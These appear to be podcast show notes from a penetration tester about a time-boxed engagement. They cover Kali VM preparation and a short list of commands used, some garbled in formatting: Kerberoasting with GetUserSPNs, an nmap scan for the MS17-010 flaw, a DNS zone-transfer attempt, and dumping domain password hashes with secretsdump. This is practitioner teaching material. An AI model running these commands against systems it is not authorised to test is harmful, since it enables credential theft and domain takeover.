Jun 26, 2020
Today's episode is a fun tale of pentest pwnage! Interestingly, to me this pentest had a ton of time-sponging issues on the front end, but the TTDA (Time to Domain Admin) was maybe my fastest ever.
I had to actually roll a fresh Kali VM to upload to the customer site, and I learned (the hard way) to make that VM disk as lean as possible. I got away with a 15 gig drive, and the OS+tools+updates took up about 12 gig.
One of the biggest lessons I learned from this experience is to make sure that not only is your Kali box updated before you take it to a customer site (see this script), but you should make sure you install all the tool dependencies beforehand as well (specifically, Eyewitness, Impacket and MITM6).
This pentest was also extremely time-boxed, so I tried to get as much bang out of it as possible. This included:
GetUserSPNs.py
-request -dc-ip x.x.x.x domain/user
)nmap -Pn -p445 --open --max-hostgroup
3 --script smb-vuln-ms17-010 192.168.0.0/24 -oA
vulnerable-2-eblue
) and try this
method of exploiting itdnsrecon -d name.of.fqdn -t
axf
)sudo python ./secretsdump.py -ntds /loot/Active\
Directory/ntds.dit -system /loot/registry/SYSTEM -hashes
lmhash:nthash LOCAL -outputfile /loot/ad-pw-dump